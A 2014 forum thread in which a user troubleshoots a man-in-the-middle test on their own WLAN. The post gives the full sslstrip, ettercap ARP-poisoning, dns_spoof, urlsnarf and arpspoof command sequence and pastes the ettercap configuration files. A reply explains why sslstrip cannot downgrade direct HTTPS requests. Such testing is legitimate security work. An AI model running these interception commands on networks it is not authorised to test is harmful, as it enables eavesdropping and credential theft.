GarrettVD Posted September 4, 2014 Share Posted September 4, 2014 (edited) I am attempting to perform a MitM-style attack from my machine (MacBook Pro running 64-Bit Kali), by means of ARP-poisoning the communication between my router and my targetted machine (a MacBook Air running OSX Mavericks) on my WLAN (WPA2-secured network). In addition, I would like to employ a dns_spoof.I am using a combination of the following:- SSLStrip- Ettercap (with the dns_spoof plugin enabled).- urlsnarf- Wireshark (for examining post-test PCAP results)The commands I perform are as follows: iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain sslstrip -p -k -w /root/sslstrip.log iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 urlsnarf -i wlan0 | grep http > /root/session.txt # 192.168.2.1 = router, 192.168.2.130 = Macbook Air echo 1 > /proc/sys/net/ipv4/ip_forward; ettercap -T -q -i wlan0 -P dns_spoof -M arp:remote /192.168.2.1/ /192.168.2.130/ ettercap -T -i wlan0 -w /root/session.pcap -P dns_spoof -L /root/session -M arp:remote /192.168.2.1/ /192.168.2.130/ # This runs for a while,I then stop manually... and then clean up and examine results in Wireshark wireshark & killall sslstrip killall python killall urlsnarf iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain etterlog -p -i /root/session.eci I am able to intercept and decode http packets just fine. Unfortunately, I've had little success in capturing redirecting an HTTPS connection to an HTTP one (which I presume SSLStrip should be doing for me). I've tested by targeting multiple machines running different operating systems. For example, when I attempt to access https://www.foo.com/, I'd expect to be redirected to http://www.foo.com/. Instead, what happens is I will receive an untrusted certificate error (Windows 7 + IE, sometimes OSX Mavericks + Safari), a timeout (Mavericks + Safari, iPhone 4s + Safari). Furthermore, the dns_spoof doesn't load; just resolves the domain as it should. (see my /etc/ettercap/etter.dns configuration below).I've un-commented the iptables redirect commands within /etc/etter/etter.conf, as well as set the ec_uid and ec_gid to 0 (from the default of 65534) . . . [privs] ec_uid = 0 # nobody is the default ec_gid = 0 # nobody is the default . . . # if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" . . . Alternatively, for a simple dnsspoof, I've tried a simple combination of arpsoof + dnsspoof. Doesn't work either. :( echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i wlan0 -t 192.168.2.130 192.168.2.1 dnsspoof -i wlan0 -f /root/hosts.txt I've Googled for a few days now, but after reading post-upon-post of the same ill-fated solutions, alternatives and workarounds, I'm kind of stumped, to say the least. Some configuration files can be seen below...Any help would be greatly appreciated.Thanks, ############################################################################# ## ettercap -- etter.dns -- host file for dns_spoof plugin ## ## Copyright © ALoR & NaGA ## ## This program is free software; you can redistribute it and/or modify ## it under the terms of the GNU General Public License as published by ## the Free Software Foundation; either version 2 of the License, or ## (at your option) any later version. ## ############################################################################## ## Sample hosts file for dns_spoof plugin ## ## the format is (for A query): ## www.myhostname.com A 168.11.22.33 ## *.foo.com A 168.44.55.66 ## ## ... for a AAAA query (same hostname allowed): ## www.myhostname.com AAAA 2001:db8::1 ## *.foo.com AAAA 2001:db8::2 ## ## or to skip a protocol family (useful with dual-stack): ## www.hotmail.com AAAA :: ## www.yahoo.com A 0.0.0.0 ## ## or for PTR query: ## www.bar.com PTR 10.0.0.10 ## www.google.com PTR ::1 ## ## or for MX query (either IPv4 or IPv6): ## domain.com MX xxx.xxx.xxx.xxx ## domain2.com MX xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx ## domain3.com MX xxxx:xxxx::y ## ## or for WINS query: ## workgroup WINS 127.0.0.1 ## PC* WINS 127.0.0.1 ## ## or for SRV query (either IPv4 or IPv6): ## service._tcp|_udp.domain SRV 192.168.1.10:port ## service._tcp|_udp.domain SRV [2001:db8::3]:port ## ## NOTE: the wildcarded hosts can't be used to poison the PTR requests ## so if you want to reverse poison you have to specify a plain ## host. (look at the www.microsoft.com example) ## ############################################################################################################## microsoft sucks ;)# redirect it to www.linux.org#microsoft.com A 198.182.2.23*.microsoft.com A 198.182.2.23www.microsoft.com PTR 198.182.2.23 foo.com A 198.168.2.23*.foo.com A 198.168.2.23www.foo.com PTR 198.168.2.23 # Wildcards in PTR are not allowed########################################### no one out there can have our domains...#www.alor.org A 127.0.0.1www.naga.org A 127.0.0.1www.naga.org AAAA 2001:db8::2########################################### dual stack enabled hosts does not make life easy# force them back to single stackwww.ietf.org A 127.0.0.1www.ietf.org AAAA ::www.example.org A 0.0.0.0www.example.org AAAA ::1################################################ one day we will have our ettercap.org domain#www.ettercap.org A 127.0.0.1www.ettercap-project.org A 127.0.0.1ettercap.sourceforge.net A 216.136.171.201www.ettercap.org PTR ::1################################################ some MX examples#alor.org MX 127.0.0.1naga.org MX 127.0.0.1example.org MX 127.0.0.2microsoft.com MX 2001:db8::1ce:c01d:bee3################################################ This messes up NetBIOS clients using DNS# resolutions. I.e. Windows/Samba file sharing.#LAB-PC* WINS 127.0.0.1################################################ some service discovery examplesxmpp-server._tcp.jabber.org SRV 192.168.1.10:5269 ldap._udp.mynet.com SRV [2001:db8:c001:beef::1]:389 # vim:ts=8:noexpandtab [############################################################################# ## ettercap -- etter.conf -- configuration file ## ## Copyright © ALoR & NaGA ## ## This program is free software; you can redistribute it and/or modify ## it under the terms of the GNU General Public License as published by ## the Free Software Foundation; either version 2 of the License, or ## (at your option) any later version. ## ## #############################################################################[privs]ec_uid = 0 # nobody is the defaultec_gid = 0 # nobody is the default[mitm]arp_storm_delay = 10 # secondsarp_poison_warm_up = 1 # secondsarp_poison_delay = 10 # secondsarp_poison_icmp = 1 # booleanarp_poison_reply = 1 # booleanarp_poison_request = 0 # booleanarp_poison_equal_mac = 1 # booleandhcp_lease_time = 1800 # secondsport_steal_delay = 10 # secondsport_steal_send_delay = 2000 # microseconds[connections]connection_timeout = 300 # secondsconnection_idle = 5 # secondsconnection_buffer = 10000 # bytesconnect_timeout = 5 # seconds[stats]sampling_rate = 50 # number of packets[misc]close_on_eof = 1 # boolean valuestore_profiles = 1 # 0 = disabled; 1 = all; 2 = local; 3 = remoteaggressive_dissectors = 1 # boolean valueskip_forwarded_pcks = 1 # boolean valuechecksum_check = 0 # boolean valuesubmit_fingerprint = 0 # boolean valid (set if you want ettercap to submit unknown finger prints)checksum_warning = 0 # boolean value (valid only if checksum_check is 1)############################################################################## You can specify what DISSECTORS are to be enabled or not...## e.g.: ftp = 21 enabled on port 21 (tcp is implicit)# ftp = 2345 enabled on non standard port# ftp = 21,453 enabled on port 21 and 453# ftp = 0 disabled## NOTE: some dissectors have multiple default ports, if you specify a new# one, all the default ports will be overwritten###dissector default port[dissectors]ftp = 21 # tcp 21ssh = 22 # tcp 22telnet = 23 # tcp 23smtp = 25 # tcp 25dns = 53 # udp 53dhcp = 67 # udp 68http = 80 # tcp 80ospf = 89 # ip 89 (IPPROTO 0x59)pop3 = 110 # tcp 110#portmap = 111 # tcp / udpvrrp = 112 # ip 112 (IPPROTO 0x70)nntp = 119 # tcp 119smb = 139,445 # tcp 139 445imap = 143,220 # tcp 143 220snmp = 161 # udp 161bgp = 179 # tcp 179ldap = 389 # tcp 389https = 443 # tcp 443ssmtp = 465 # tcp 465rlogin = 512,513 # tcp 512 513rip = 520 # udp 520nntps = 563 # tcp 563ldaps = 636 # tcp 636telnets = 992 # tcp 992imaps = 993 # tcp 993ircs = 994 # tcp 993pop3s = 995 # tcp 995socks = 1080 # tcp 1080radius = 1645,1646 # udp 1645 1646msn = 1863 # tcp 1863cvs = 2401 # tcp 2401mysql = 3306 # tcp 3306icq = 5190 # tcp 5190ymsg = 5050 # tcp 5050mdns = 5353 # udp 5353vnc = 5900,5901,5902,5903 # tcp 5900 5901 5902 5903x11 = 6000,6001,6002,6003 # tcp 6000 6001 6002 6003irc = 6666,6667,6668,6669 # tcp 6666 6667 6668 6669gg = 8074 # tcp 8074proxy = 8080 # tcp 8080rcon = 27015,27960 # udp 27015 27960ppp = 34827 # special case ;) this is the Net Layer codeTN3270 = 23,992 # tcp 23 992## you can change the colors of the curses GUI.# here is a list of values:# 0 Black 4 Blue# 1 Red 5 Magenta# 2 Green 6 Cyan# 3 Yellow 7 White#[curses]color_bg = 0color_fg = 7color_join1 = 2color_join2 = 4color_border = 7color_title = 3color_focus = 6color_menu_bg = 4color_menu_fg = 6color_window_bg = 4color_window_fg = 7color_selection_bg = 6color_selection_fg = 6color_error_bg = 1color_error_fg = 3color_error_border = 3## This section includes all the configurations that needs a string as a# parmeter such as the redirect command for SSL mitm attack.#[strings]# the default encoding to be used for the UTF-8 visualizationutf8_encoding = "ISO-8859-1"# the command used by the remote_browser pluginremote_browser = "xdg-open http://%host%url"###################################### redir_command_on/off###################################### you must provide a valid script for your operating system in order to have# the SSL dissection available# note that the cleanup script is executed without enough privileges (because# they are dropped on startup). so you have to either: provide a setuid program# or set the ec_uid to 0, in order to be sure the cleanup script will be# executed properly# NOTE: this script is executed with an execve(), so you can't use pipes or# output redirection as if you were in a shell. We suggest you to make a script if# you need those commands.#---------------# Linux#---------------# if you use ipchains: #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"# if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"#---------------# Mac Os X#---------------# quick and dirty way: #redir_command_on = "ipfw add set %set fwd 127.0.0.1,%rport tcp from any to any %port in via %iface" #redir_command_off = "ipfw -q delete set %set"# a better solution is to use a script that keeps track of the rules interted# and then deletes them on exit: # redir_command_on: # ----- cut here ------- # #!/bin/sh # if [ -a "/tmp/osx_ipfw_rules" ]; then # ipfw -q add `head -n 1 osx_ipfw_rules` fwd 127.0.0.1,$1 tcp from any to any $2 in via $3 # else # ipfw add fwd 127.0.0.1,$1 tcp from any to any $2 in via $3 | cut -d " " -f 1 >> /tmp/osx_ipfw_rules # fi # ----- cut here ------- # redir_command_off: # ----- cut here ------- # #!/bin/sh # if [ -a "/tmp/osx_ipfw_rules" ]; then # ipfw -q delete `head -n 1 /tmp/osx_ipfw_rules` # rm -f /tmp/osx_ipfw_rules # fi # ----- cut here -------#---------------# Open BSD#---------------# unfortunately the pfctl command does not accepts direct rules adding# you have to use a script wich executed the following command: # ----- cut here ------- # #!/bin/sh # rdr pass on $1 inet proto tcp from any to any port $2 -> localhost port $3 | pfctl -a sslsniff -f - # ----- cut here -------# it's important to remember that you need "rdr-anchor sslsniff" in your# pf.conf in the TRANSLATION section. #redir_command_on = "the_script_described_above %iface %port %rport" #redir_command_off = "pfctl -a sslsniff -Fn"# also, if you create a group called "pfusers" and have EC_GID be that group,# you can do something like:# chgrp pfusers /dev/pf# chmod g+rw /dev/pf# such that all users in "pfusers" can run pfctl commands; thus allowing non-root# execution of redir commands.########### EOF ########### Edited September 4, 2014 by GarrettVD Quote Link to comment Share on other sites More sharing options...
digininja Posted September 5, 2014 Share Posted September 5, 2014 sslstrip doesn't downgrade direct requests for HTTPS, it swaps any references for HTTPS for HTTP in any HTTP traffic it sees. The reason it can't downgrade is because the browser is expecting HTTPS traffic so won't settle for anything else. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.